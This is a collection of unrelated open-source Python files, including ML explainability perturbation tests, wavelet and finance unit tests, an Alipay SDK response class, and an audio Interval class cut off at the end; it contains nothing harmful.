perturbation_arguments.args.is_text_pert else "image" num_samples = perturbation_arguments.args.num_samples method_expl = {"transformer_attribution": expl.generate_transformer_att, "ours_no_lrp": expl.generate_ours, "partial_lrp": expl.generate_partial_lrp, "raw_attn": expl.generate_raw_attn, "attn_gradcam": expl.generate_attn_gradcam, "rollout": expl.generate_rollout} i = 0 # saving cams per method for all the samples self.model.eval() disable_tqdm = not use_tqdm or not is_master() if modality == "image": steps = [0, 0.5, 0.75, 0.95, 0.96, 0.97, 0.98, 0.99, 1] else: steps = [0, 0.25, 0.5, 0.75, 0.8, 0.85, 0.9, 0.95, 1] step_acc = [0] * len(steps) print("test type {0} pert type {1} expl type {2}".format(modality, pert_type, method)) for batch in tqdm.tqdm(loader, disable=disable_tqdm): method_cam = method_expl[method](batch) if pert_type == "pos": method_cam *= -1 if modality == "image": input_mask = batch['input_mask'] bbox_scores = method_cam[0, input_mask.sum(1):] image_boxes_len = len(bbox_scores) image_features = batch['image_feature_0'].clone() image_bboxes = batch['image_info_0']['bbox'][0].copy() for step_idx, step in enumerate(steps): curr_num_tokens = int((1 - step) * image_boxes_len) # find top step boxes _, top_bboxes_indices = bbox_scores.topk(k=curr_num_tokens, dim=-1) top_bboxes_indices = top_bboxes_indices.cpu().data.numpy() # remove the top step boxes from the batch info batch['image_feature_0'] = image_features[:, top_bboxes_indices, :] batch['image_info_0']['bbox'][0] = image_bboxes[top_bboxes_indices] batch['image_info_0']['max_features'] = torch.tensor(curr_num_tokens).to(batch['image_feature_0'].device).view(1) batch['image_info_0']['num_boxes'][0] = curr_num_tokens report = self._forward(batch) step_acc[step_idx] += report["targets"][0,report["scores"].argmax()].item() i += 1 if i > num_samples: break else: input_mask = batch['input_mask'].clone() # the CLS here is ? cls_index = (input_mask.sum(1) - 2).item() seg_ids = batch["segment_ids"].clone() # we don't count the ? token since it's the equivalent to CLS here # and we want to keep the CLS intact text_scores = method_cam[0, 1:cls_index] text_len = len(text_scores) input_ids = batch['input_ids'].clone() tokens = batch['tokens'].copy() for step_idx, step in enumerate(steps): curr_num_tokens = int((1 - step) * text_len) # find top step tokens _, top_bboxes_indices = text_scores.topk(k=curr_num_tokens, dim=-1) top_bboxes_indices = top_bboxes_indices.cpu().data.numpy() # sorting for positional embedding top_bboxes_indices = list(top_bboxes_indices) # add the last 2 tokens (CLS+SEP) top_bboxes_indices = [0, cls_index, cls_index+1] +\ [top_bboxes_indices[i] + 1 for i in range(len(top_bboxes_indices))] top_bboxes_indices = sorted(top_bboxes_indices) # modify the first tokens of the input mask input_mask_indices = top_bboxes_indices + \ [i for i in range(input_mask.sum(1), input_mask.shape[1])] # remove the top step boxes from the batch info batch['input_ids'] = input_ids[:, top_bboxes_indices] batch['tokens'] = [[tokens[0][i] for i in top_bboxes_indices]] batch['input_mask'] = input_mask[:, input_mask_indices] batch["segment_ids"] = seg_ids[:, input_mask_indices] report = self._forward(batch) step_acc[step_idx] += report["targets"][0, report["scores"].argmax()].item() i += 1 if i > num_samples: break print("pert type {0}".format(pert_type)) step_acc = [acc / num_samples * 100 for acc in step_acc] print(step_acc)
onir/datasets/query_iter.py
tgeral68/OpenNIR
140
11096510
from onir import util @util.allow_redefinition_iter def query_iter(dataset, fields: set, shuf: bool = False, random=None ): qids = dataset.all_query_ids() if shuf: qids = list(qids) random.shuffle(qids) for qid in qids: record = dataset.build_record(fields, query_id=qid) yield {f: record[f] for f in fields} class QueryIter: def __init__(self, dataset, fields, shuf=False, random=None): self.it = query_iter(dataset, fields, shuf, random) self.consumed = 0 self.len = dataset.num_queries() def __next__(self): self.consumed += 1 return next(self.it) def __iter__(self): return self def __length_hint__(self): return max(self.len - self.consumed, 0)
torch/distributed/constants.py
MagiaSN/pytorch
206
11096521
from datetime import timedelta # Default process group wide timeout, if applicable. # This only applies to the gloo and nccl backends # (only if NCCL_BLOCKING_WAIT or NCCL_ASYNC_ERROR_HANDLING is set to 1). # To make an attempt at backwards compatibility with THD, we use an # extraordinarily high default timeout, given that THD did not have timeouts. default_pg_timeout = timedelta(minutes=30)
alipay/aop/api/response/AlipayFundJointaccountDetailQueryResponse.py
antopen/alipay-sdk-python-all
213
11096542
<filename>alipay/aop/api/response/AlipayFundJointaccountDetailQueryResponse.py #!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.response.AlipayResponse import AlipayResponse from alipay.aop.api.domain.JointAccountQuotaRespDTO import JointAccountQuotaRespDTO from alipay.aop.api.domain.AuthorizedRuleDTO import AuthorizedRuleDTO from alipay.aop.api.domain.InviteResultDTO import InviteResultDTO from alipay.aop.api.domain.JointAccountMemberInfoRespDTO import JointAccountMemberInfoRespDTO class AlipayFundJointaccountDetailQueryResponse(AlipayResponse): def __init__(self): super(AlipayFundJointaccountDetailQueryResponse, self).__init__() self._account_id = None self._account_name = None self._account_quota = None self._account_status = None self._agreement_no = None self._authorized_rule = None self._available_balance = None self._biz_scene = None self._creator_id = None self._creator_out_id = None self._freeze_balance = None self._invite_result_list = None self._member_list = None self._product_code = None @property def account_id(self): return self._account_id @account_id.setter def account_id(self, value): self._account_id = value @property def account_name(self): return self._account_name @account_name.setter def account_name(self, value): self._account_name = value @property def account_quota(self): return self._account_quota @account_quota.setter def account_quota(self, value): if isinstance(value, list): self._account_quota = list() for i in value: if isinstance(i, JointAccountQuotaRespDTO): self._account_quota.append(i) else: self._account_quota.append(JointAccountQuotaRespDTO.from_alipay_dict(i)) @property def account_status(self): return self._account_status @account_status.setter def account_status(self, value): self._account_status = value @property def agreement_no(self): return self._agreement_no @agreement_no.setter def agreement_no(self, value): self._agreement_no = value @property def authorized_rule(self): return self._authorized_rule @authorized_rule.setter def authorized_rule(self, value): if isinstance(value, AuthorizedRuleDTO): self._authorized_rule = value else: self._authorized_rule = AuthorizedRuleDTO.from_alipay_dict(value) @property def available_balance(self): return self._available_balance @available_balance.setter def available_balance(self, value): self._available_balance = value @property def biz_scene(self): return self._biz_scene @biz_scene.setter def biz_scene(self, value): self._biz_scene = value @property def creator_id(self): return self._creator_id @creator_id.setter def creator_id(self, value): self._creator_id = value @property def creator_out_id(self): return self._creator_out_id @creator_out_id.setter def creator_out_id(self, value): self._creator_out_id = value @property def freeze_balance(self): return self._freeze_balance @freeze_balance.setter def freeze_balance(self, value): self._freeze_balance = value @property def invite_result_list(self): return self._invite_result_list @invite_result_list.setter def invite_result_list(self, value): if isinstance(value, list): self._invite_result_list = list() for i in value: if isinstance(i, InviteResultDTO): self._invite_result_list.append(i) else: self._invite_result_list.append(InviteResultDTO.from_alipay_dict(i)) @property def member_list(self): return self._member_list @member_list.setter def member_list(self, value): if isinstance(value, list): self._member_list = list() for i in value: if isinstance(i, JointAccountMemberInfoRespDTO): self._member_list.append(i) else: self._member_list.append(JointAccountMemberInfoRespDTO.from_alipay_dict(i)) @property def product_code(self): return self._product_code @product_code.setter def product_code(self, value): self._product_code = value def parse_response_content(self, response_content): response = super(AlipayFundJointaccountDetailQueryResponse, self).parse_response_content(response_content) if 'account_id' in response: self.account_id = response['account_id'] if 'account_name' in response: self.account_name = response['account_name'] if 'account_quota' in response: self.account_quota = response['account_quota'] if 'account_status' in response: self.account_status = response['account_status'] if 'agreement_no' in response: self.agreement_no = response['agreement_no'] if 'authorized_rule' in response: self.authorized_rule = response['authorized_rule'] if 'available_balance' in response: self.available_balance = response['available_balance'] if 'biz_scene' in response: self.biz_scene = response['biz_scene'] if 'creator_id' in response: self.creator_id = response['creator_id'] if 'creator_out_id' in response: self.creator_out_id = response['creator_out_id'] if 'freeze_balance' in response: self.freeze_balance = response['freeze_balance'] if 'invite_result_list' in response: self.invite_result_list = response['invite_result_list'] if 'member_list' in response: self.member_list = response['member_list'] if 'product_code' in response: self.product_code = response['product_code']
pywt/tests/test_wpnd.py
tbbharaj/pywt
1,435
11096551
<gh_stars>1000+ #!/usr/bin/env python from __future__ import division, print_function, absolute_import from itertools import product from functools import reduce import operator import numpy as np from numpy.testing import (assert_allclose, assert_, assert_raises, assert_equal) import pywt def test_traversing_tree_nd(): x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64) wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric') assert_(np.all(wp.data == x)) assert_(wp.path == '') assert_(wp.level == 0) assert_(wp.maxlevel == 3) assert_allclose(wp['aa'].data, np.array([[3., 7., 11., 15.]] * 4), rtol=1e-12) assert_allclose(wp['da'].data, np.zeros((4, 4)), rtol=1e-12, atol=1e-14) assert_allclose(wp['ad'].data, -np.ones((4, 4)), rtol=1e-12, atol=1e-14) assert_allclose(wp['dd'].data, np.zeros((4, 4)), rtol=1e-12, atol=1e-14) assert_allclose(wp['aa'*2].data, np.array([[10., 26.]] * 2), rtol=1e-12) # __getitem__ using a tuple acces instead assert_allclose(wp[('aa', 'aa')].data, np.array([[10., 26.]] * 2), rtol=1e-12) assert_(wp['aa']['aa'].data is wp['aa'*2].data) assert_allclose(wp['aa'*3].data, np.array([[36.]]), rtol=1e-12) assert_raises(IndexError, lambda: wp['aa'*(wp.maxlevel+1)]) assert_raises(ValueError, lambda: wp['f']) # getitem input must be a string or tuple of strings assert_raises(TypeError, wp.__getitem__, (5, 3)) assert_raises(TypeError, wp.__getitem__, 5) def test_accessing_node_attributes_nd(): x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64) wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric') assert_allclose(wp['aa'+'ad'].data, np.zeros((2, 2)) - 4, rtol=1e-12) assert_(wp['aa'+'ad'].path == 'aa'+'ad') assert_(wp['aa'+'ad'].node_name == 'ad') assert_(wp['aa'+'ad'].parent.path == 'aa') assert_allclose(wp['aa'+'ad'].parent.data, np.array([[3., 7., 11., 15.]] * 4), rtol=1e-12) # can also index via a tuple instead of concatenated strings assert_(wp[('aa', 'ad')].level == 2) assert_(wp[('aa', 'ad')].maxlevel == 3) assert_(wp[('aa', 'ad')].mode == 'symmetric') # can access a node's path as either a single string or in tuple form node = wp[('ad', 'dd')] assert_(node.path == 'addd') assert_(node.path_tuple == ('ad', 'dd')) def test_collecting_nodes_nd(): x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64) wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric') assert_(len(wp.get_level(0)) == 1) assert_(wp.get_level(0)[0].path == '') # First level assert_(len(wp.get_level(1)) == 4) assert_( [node.path for node in wp.get_level(1)] == ['aa', 'ad', 'da', 'dd']) # Second and third levels for lev in [2, 3]: assert_(len(wp.get_level(lev)) == (2**x.ndim)**lev) paths = [node.path for node in wp.get_level(lev)] expected_paths = [ reduce(operator.add, p) for p in sorted(product(['aa', 'ad', 'da', 'dd'], repeat=lev))] assert_(paths == expected_paths) def test_data_reconstruction_delete_nodes_nd(): x = np.array([[1, 2, 3, 4, 5, 6, 7, 8]] * 8, dtype=np.float64) wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric') # The user must supply either data or axes assert_raises(ValueError, pywt.WaveletPacketND, data=None, wavelet='db1', axes=None) new_wp = pywt.WaveletPacketND(data=None, wavelet='db1', mode='symmetric', axes=range(x.ndim)) new_wp['ad'+'da'] = wp['ad'+'da'].data new_wp['ad'*2] = wp['ad'+'da'].data new_wp['ad'+'dd'] = np.zeros((2, 2), dtype=np.float64) new_wp['aa'] = [[3.0, 7.0, 11.0, 15.0]] * 4 new_wp['dd'] = np.zeros((4, 4), dtype=np.float64) new_wp['da'] = wp['da'] # all zeros assert_allclose(new_wp.reconstruct(update=False), np.array([[1.5, 1.5, 3.5, 3.5, 5.5, 5.5, 7.5, 7.5]] * 8), rtol=1e-12) new_wp['ad'+'aa'] = wp['ad'+'aa'].data assert_allclose(new_wp.reconstruct(update=False), x, rtol=1e-12) del(new_wp['ad'+'aa']) # TypeError on accessing deleted node assert_raises(TypeError, lambda: new_wp['ad'+'aa']) new_wp['ad'+'aa'] = wp['ad'+'aa'].data assert_(new_wp.data is None) assert_allclose(new_wp.reconstruct(update=True), x, rtol=1e-12) assert_allclose(new_wp.data, x, rtol=1e-12) # TODO: decompose=True def test_wavelet_packet_dtypes(): shape = (16, 8, 8) for dtype in [np.float32, np.float64, np.complex64, np.complex128]: x = np.random.randn(*shape).astype(dtype) if np.iscomplexobj(x): x = x + 1j*np.random.randn(*shape).astype(x.real.dtype) wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric') # no unnecessary copy made assert_(wp.data is x) # full decomposition wp.get_level(wp.maxlevel) # reconstruction from coefficients should preserve dtype r = wp.reconstruct(False) assert_equal(r.dtype, x.dtype) assert_allclose(r, x, atol=1e-6, rtol=1e-6) def test_wavelet_packet_axes(): rstate = np.random.RandomState(0) shape = (32, 16, 8) x = rstate.standard_normal(shape) for axes in [(0, 1), 1, (-3, -2, -1), (0, 2), (1, )]: wp = pywt.WaveletPacketND(data=x, wavelet='db1', mode='symmetric', axes=axes) # partial decomposition nodes = wp.get_level(1) # size along the transformed axes has changed for ax2 in range(x.ndim): if ax2 in tuple(np.atleast_1d(axes) % x.ndim): nodes[0].data.shape[ax2] < x.shape[ax2] else: nodes[0].data.shape[ax2] == x.shape[ax2] # recontsruction from coefficients should preserve dtype r = wp.reconstruct(False) assert_equal(r.dtype, x.dtype) assert_allclose(r, x, atol=1e-12, rtol=1e-12) # must have non-duplicate axes assert_raises(ValueError, pywt.WaveletPacketND, data=x, wavelet='db1', axes=(0, 0))
cinder/tests/unit/backup/drivers/test_backup_glusterfs.py
helenwalsh/cinder
571
11096601
# Copyright (c) 2013 Red Hat, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for GlusterFS backup driver.""" import os from unittest import mock from os_brick.remotefs import remotefs as remotefs_brick from cinder.backup.drivers import glusterfs from cinder import context from cinder import exception from cinder.tests.unit import test from cinder import utils FAKE_BACKUP_MOUNT_POINT_BASE = '/fake/mount-point-base' FAKE_HOST = 'fake_host' FAKE_VOL_NAME = 'backup_vol' FAKE_BACKUP_SHARE = '%s:%s' % (FAKE_HOST, FAKE_VOL_NAME) FAKE_BACKUP_PATH = os.path.join(FAKE_BACKUP_MOUNT_POINT_BASE, 'e51e43e3c63fd5770e90e58e2eafc709') class BackupGlusterfsShareTestCase(test.TestCase): def setUp(self): super(BackupGlusterfsShareTestCase, self).setUp() self.ctxt = context.get_admin_context() def test_check_configuration(self): self.override_config('glusterfs_backup_share', FAKE_BACKUP_SHARE) self.mock_object(glusterfs.GlusterfsBackupDriver, '_init_backup_repo_path', return_value=FAKE_BACKUP_PATH) driver = glusterfs.GlusterfsBackupDriver(self.ctxt) driver.check_for_setup_error() def test_check_configuration_no_backup_share(self): self.override_config('glusterfs_backup_share', None) self.mock_object(glusterfs.GlusterfsBackupDriver, '_init_backup_repo_path', return_value=FAKE_BACKUP_PATH) driver = glusterfs.GlusterfsBackupDriver(self.ctxt) self.assertRaises(exception.InvalidConfigurationValue, driver.check_for_setup_error) def test_init_backup_repo_path(self): self.override_config('glusterfs_backup_share', FAKE_BACKUP_SHARE) self.override_config('glusterfs_backup_mount_point', FAKE_BACKUP_MOUNT_POINT_BASE) mock_remotefsclient = mock.Mock() mock_remotefsclient.get_mount_point = mock.Mock( return_value=FAKE_BACKUP_PATH) self.mock_object(glusterfs.GlusterfsBackupDriver, 'check_for_setup_error') self.mock_object(remotefs_brick, 'RemoteFsClient', return_value=mock_remotefsclient) self.mock_object(os, 'getegid', return_value=333333) self.mock_object(utils, 'get_file_gid', return_value=333333) self.mock_object(utils, 'get_file_mode', return_value=00000) self.mock_object(utils, 'get_root_helper') with mock.patch.object(glusterfs.GlusterfsBackupDriver, '_init_backup_repo_path'): driver = glusterfs.GlusterfsBackupDriver(self.ctxt) self.mock_object(driver, '_execute') path = driver._init_backup_repo_path() self.assertEqual(FAKE_BACKUP_PATH, path) utils.get_root_helper.called_once() mock_remotefsclient.mount.assert_called_once_with(FAKE_BACKUP_SHARE) mock_remotefsclient.get_mount_point.assert_called_once_with( FAKE_BACKUP_SHARE)
dnachisel/biotools/formatting_operations.py
simone-pignotti/DnaChisel
124
11096646
"""Text and number formatting operations""" from copy import deepcopy import json import numpy as np def round_all_numbers_in_dict(d, rounding_digits=2, outplace=True): """ Return a new version of dict d with all floats rounded to N digits.""" if outplace: d = deepcopy(d) for k, v in d.items(): if isinstance(v, float): d[k] = np.round(v, rounding_digits) if isinstance(v, dict): round_all_numbers_in_dict(v, rounding_digits, outplace=False) return d def dict_to_pretty_string(d, rounding_digits=2, indent=2): """Return a nicely JSON-like formatted string to print a dict.""" d = round_all_numbers_in_dict(d, rounding_digits) formatted_text = json.dumps(d, indent=indent) for char in '{}",': formatted_text = formatted_text.replace(char, "") return formatted_text def score_to_formatted_string(score, characters=9): """Transform a number (score) into a best-format string. The format will be either int (2234), float (10.234) or engineering (1.20E5), whichever is shorter. The score is then padded with left whitespaces to obtained the desired number of ``characters``.""" raw = str(int(score) if (int(score) == score) else score) as_float = "%.02f" % score as_eng = "%.02E." % score return min([raw, as_float, as_eng], key=len).rjust(characters)
qf_lib_tests/unit_tests/portfolio_construction/test_black_litterman.py
webclinic017/qf-lib
198
11096675
<gh_stars>100-1000 # Copyright 2016-present CERN – European Organization for Nuclear Research # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from unittest import TestCase import numpy as np from pandas import DataFrame, Series from qf_lib.portfolio_construction.black_litterman.black_litterman import BlackLitterman # THIS TEST REQUIRES TAU CALCULATION AS: 1 / nr_of_observations class TestBlackLitterman(TestCase): @classmethod def setUpClass(cls): cls.hist_cov_data = np.array([[0.00490, 0.00672, 0.01050, 0.01680], [0.00672, 0.01440, 0.02520, 0.03600], [0.01050, 0.02520, 0.09000, 0.14400], [0.01680, 0.03600, 0.14400, 0.36000]]) cls.weights_data = [0.05, 0.40, 0.45, 0.10] cls.names = ['A1', 'A2', 'A3', 'A4'] cls.hist_cov = DataFrame(cls.hist_cov_data, columns=cls.names, index=cls.names) cls.weights = Series(data=cls.weights_data, index=cls.names) cls.number_of_data_points = 120 def test_bl_model_components(self): bl = BlackLitterman(self.hist_cov, self.weights, self.number_of_data_points) print("=====> LAMBDA") lambda_ = bl.calculate_lambda() print(lambda_) self.assertAlmostEqual(lambda_, 2.2369058, places=6) prior_mean, prior_cov = bl.calculate_prior() print("=====> Prior Mean") print(prior_mean) exact_mean = np.zeros(4) exact_mean[0] = 0.0208882 exact_mean[1] = 0.0470556 exact_mean[2] = 0.1465285 exact_mean[3] = 0.2595706 self.assertTrue(np.allclose(prior_mean, exact_mean, rtol=0, atol=1e-6)) print("=====> Prior COV") print(prior_cov) exact_cov = np.zeros([4, 4]) exact_cov[0, :] = np.array([0.004900, 0.006720, 0.010500, 0.016800]) exact_cov[1, :] = np.array([0.006720, 0.014400, 0.025200, 0.036000]) exact_cov[2, :] = np.array([0.010500, 0.025200, 0.090000, 0.144000]) exact_cov[3, :] = np.array([0.016800, 0.036000, 0.144000, 0.360000]) exact_cov = 1 / 120 * exact_cov # tau * cov self.assertTrue(np.allclose(prior_cov, exact_cov, rtol=0, atol=1e-6)) print("=====> Tau") print(bl.tau) self.assertAlmostEqual(bl.tau, 0.0083333, places=6) def test_bl_model_views(self): bl = BlackLitterman(self.hist_cov, self.weights, self.number_of_data_points) bl.add_relative_view(2, 0, 0.1, 0.02481598) bl.add_absolute_view(1, 0.03, 0.010954451) print("=====> P") print(bl.P) exact_P = np.zeros([2, 4]) exact_P[0, :] = np.array([-1.0, 0.0, 1.0, 0.0]) exact_P[1, :] = np.array([0.0, 1.0, 0.0, 0.0]) self.assertTrue(np.allclose(bl.P, exact_P, rtol=0, atol=1e-7)) print("=====> Q") print(bl.Q) exact_Q = np.zeros([2, 1]) exact_Q[0, 0] = 0.1 exact_Q[1, 0] = 0.03 self.assertTrue(np.allclose(bl.Q, exact_Q, rtol=0, atol=1e-7)) print("=====> OMEGA") print(bl.Omega) exact_Omega = np.zeros([2, 2]) exact_Omega[0, 0] = 0.00061583 exact_Omega[1, 1] = 0.00012000 self.assertTrue(np.allclose(bl.Omega, exact_Omega, rtol=0, atol=1e-7)) def test_bl_model_posterior(self): bl = BlackLitterman(self.hist_cov, self.weights, self.number_of_data_points) bl.add_relative_view(2, 0, 0.1, 0.02481598) bl.add_absolute_view(1, 0.03, 0.010954451) posterior_mean, posterior_cov = bl.calculate_posterior() print("=====> POSTERIOR Mean") print(posterior_mean) exact_mean = np.zeros(4) exact_mean[0] = 0.016769 exact_mean[1] = 0.037529 exact_mean[2] = 0.124758 exact_mean[3] = 0.226997 self.assertTrue(np.allclose(posterior_mean, exact_mean, rtol=0, atol=1e-6)) print("=====> POSTERIOR COV") print(posterior_cov) exact_cov = np.zeros([4, 4]) exact_cov[0, :] = np.array([0.004928, 0.006747, 0.010533, 0.016862]) exact_cov[1, :] = np.array([0.006747, 0.014455, 0.025269, 0.036091]) exact_cov[2, :] = np.array([0.010533, 0.025269, 0.090320, 0.144533]) exact_cov[3, :] = np.array([0.016862, 0.036091, 0.144533, 0.361961]) self.assertTrue(np.allclose(posterior_cov, exact_cov, rtol=0, atol=1e-6)) if __name__ == '__main__': unittest.main()
tests/unpickle-strtree.py
Jeremiah-England/Shapely
2,382
11096700
# See test_strtree.py::test_pickle_persistence import sys import os sys.path.append(os.getcwd()) import pickle from shapely.geometry import Point from shapely.geos import geos_version if __name__ == "__main__": pickled_strtree = sys.stdin.buffer.read() print("received pickled strtree:", repr(pickled_strtree)) strtree = pickle.loads(pickled_strtree) # Exercise API. print("calling \"query()\"...") strtree.query(Point(0, 0)) if geos_version >= (3, 6, 0): print("calling \"nearest()\"...") strtree.nearest(Point(0, 0)) else: print("skipping \"nearest()\"") print("done")
pylayers/antprop/examples/ex_antenna2.py
usmanwardag/pylayers
143
11096710
from pylayers.antprop.antenna import * from pylayers.antprop.antvsh import * import matplotlib.pylab as plt from numpy import * import pdb """ This test : 1 : loads a measured antenna 2 : applies an electrical delay obtained from data with getdelay method 3 : evaluate the antenna vsh coefficient with a downsampling factor of 2 4 : display the 16 first """ filename = 'S1R1.mat' A = Antenna(filename,directory='ant/UWBAN/Matfile') #plot(freq,angle(A.Ftheta[:,maxPowerInd[1],maxPowerInd[2]]*exp(2j*pi*freq.reshape(len(freq))*electricalDelay))) freq = A.fa.reshape(104,1,1) delayCandidates = arange(-10,10,0.001) electricalDelay = A.getdelay(freq,delayCandidates) disp('Electrical Delay = ' + str(electricalDelay)+' ns') A.Ftheta = A.Ftheta*exp(2*1j*pi*freq*electricalDelay) A.Fphi = A.Fphi*exp(2*1j*pi*freq*electricalDelay) dsf = 2 # # Calculate Vector Spherical Harmonics # A = vsh(A,dsf) v = np.abs(A.C.Br.s1) u = np.nonzero(v==v.max()) plt.figure(figsize=(15,15)) for l in range(16): plt.subplot(4,4,l+1) plt.plot(np.real(A.C.Br.s1[:,l,0]),np.imag(A.C.Br.s1[:,l,0]),'k') plt.plot(np.real(A.C.Br.s1[:,l,1]),np.imag(A.C.Br.s1[:,l,1]),'b') plt.plot(np.real(A.C.Br.s1[:,l,2]),np.imag(A.C.Br.s1[:,l,2]),'r') plt.plot(np.real(A.C.Br.s1[:,l,2]),np.imag(A.C.Br.s1[:,l,2]),'g') plt.axis([-0.6,0.6,-0.6,0.6]) plt.title('l='+str(l)) plt.show()
greykite/sklearn/uncertainty/base_uncertainty_model.py
kenzie-q/greykite
1,503
11096727
# BSD 2-CLAUSE LICENSE # Redistribution and use in source and binary forms, with or without modification, # are permitted provided that the following conditions are met: # Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # #ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # original author: <NAME> """Defines the base uncertainty model class. All uncertainty models should inherit this class.""" from abc import abstractmethod from typing import Dict from typing import Optional import pandas as pd class BaseUncertaintyModel: """The base uncertainty model. Attributes ---------- uncertainty_dict : `dict` [`str`, any] The uncertainty model specification. It should have the following keys: "uncertainty_method": a string that is in `~greykite.sklearn.uncertainty.uncertainty_methods.UncertaintyMethodEnum`. "params": a dictionary that includes any additional parameters needed by the uncertainty method. uncertainty_method : `str` or None The name of the uncertainty model. Must be in `~greykite.sklearn.uncertainty.uncertainty_methods.UncertaintyMethodEnum`. params : `dict` [`str`, any] or None The parameters to be fed into the uncertainty model. train_df : `pandas.DataFrame` or None The data used to fit the uncertainty model. uncertainty_model : any or None The uncertainty model. pred_df : `pandas.DataFrame` The prediction result df. """ def __init__( self, uncertainty_dict: Dict[str, any], **kwargs): self.uncertainty_dict = uncertainty_dict for key, value in kwargs.items(): setattr(self, key, value) # Set by ``fit`` method. self.uncertainty_method: Optional[str] = None self.params: Optional[dict] = None self.train_df: Optional[pd.DataFrame] = None self.uncertainty_model: Optional[any] = None # Set by ``predict`` method. self.pred_df: Optional[pd.DataFrame] = None @abstractmethod def _check_input(self): """Checks that necessary input are provided in ``self.uncertainty_dict`` and ``self.train_df``. To be called after setting ``self.train_df`` in ``self.fit``. Every subclass need to override this method to check their own inputs. Do not raise errors other than `~greykite.sklearn.uncertainty.exceptions.UncertaintyError`, since this type of error will be catched and won't fail the whole pipeline. """ if self.uncertainty_dict is None: self.uncertainty_dict = {} def fit( self, train_df: pd.DataFrame): """Fits the uncertainty model. Parameters ---------- train_df : `pandas.DataFrame` The training data. """ self.train_df = train_df def predict( self, fut_df: pd.DataFrame): """Predicts the uncertainty columns for ``fut_df``. Parameters ---------- fut_df : `pandas.DataFrame` The data used for prediction. """ pass
test/test_wrong_exception_protocolbase_getitem.py
Duiesel/python-jsonschema-objects
329
11096739
import pytest import python_jsonschema_objects as pjo @pytest.fixture def base_schema(): return { "title": "example", "type": "object", "additionalProperties": False, "properties": { "dictLike": {"additionalProperties": {"type": "integer"}, "type": "object"} }, } def test_wrong_exception_protocolbase_getitem(base_schema): """ to declare a dict like object in json-schema, we are supposed to declare it as an object of additional properties. When trying to use it as dict, for instance testing if a key is inside the dictionary, methods like __contains__ in the ProtocolBase expect __getitem__ to raise a KeyError. getitem calls __getattr__ without any exception handling, which raises an AttributeError (necessary for proper behaviour of getattr, for instance). Solution found is to handle AttributeError in getitem and to raise KeyError """ builder = pjo.ObjectBuilder(base_schema) ns = builder.build_classes() t = ns.Example(dictLike={"a": 0, "b": 1}) t.validate() assert "a" in t.dictLike assert "c" not in t.dictLike assert getattr(t, "not_present", None) is None with pytest.raises(AttributeError): assert "a" not in t.notAnAttribute if __name__ == "__main__": test_wrong_exception_protocolbase_getitem(base_schema())
unsilence/lib/intervals/Interval.py
RomanKornev/unsilence
236
11096756
class Interval: """ Represents a section in time where the media file is either silent or audible """ def __init__(self, start=0, end=0, is_silent=False): """ Initializes an Interval object :param start: Start time of the interval in seconds :param end: End time of the interval in seconds :param is_silent: Whether the interval is silent or not """ self.__start = start self.__end = end self.__duration = self.__end - self.__start self.is_silent = is_silent @property def start(self): """ Get the start time :return: start time in seconds """ return self.__start @start.setter def start(self, new_start): """ Sets the new start time and updates the duration :param new_start: start time in seconds :return: None """ self.__start = new_start self.__duration = self.__end - self.__start @property def end(self): """ Get the end time :return: end time in seconds """ return self.__end @end.setter def end(self, new_end): """ Sets the new end time and updates the duration :param new_end: start time in seconds :return: None """ self.__end = new_end self.__duration = self.__end - self.__start @property def duration(self): """ Returns the duration of the interval :return: Duration of the interval """ return self.__duration def enlarge_audible_interval(self, stretch_time, is_start_interval=False, is_end_interval=False): """ Enlarges/Shrinks the audio interval, based on if it is silent or not :param stretch_time: Time the interval should be enlarged/shrunken :param is_start_interval: Whether the current interval is at the start (should not enlarge/shrink) :param is_end_interval: Whether the current interval is at the end (should not enlarge/shrink) :return: None """ if stretch_time >= self.duration: raise Exception("Stretch time to large, please choose smaller size") stretch_time_part = (-1 if self.is_silent else 1) * stretch_time / 2 if not is_start_interval: self.start -= stretch_time_part if not is_end_interval: self.end += stretch_time_part def copy(self): """ Creates a deep copy of this Interval :return: Interval deepcopy """ return Interval(self.start, self.end, self.is_silent) def 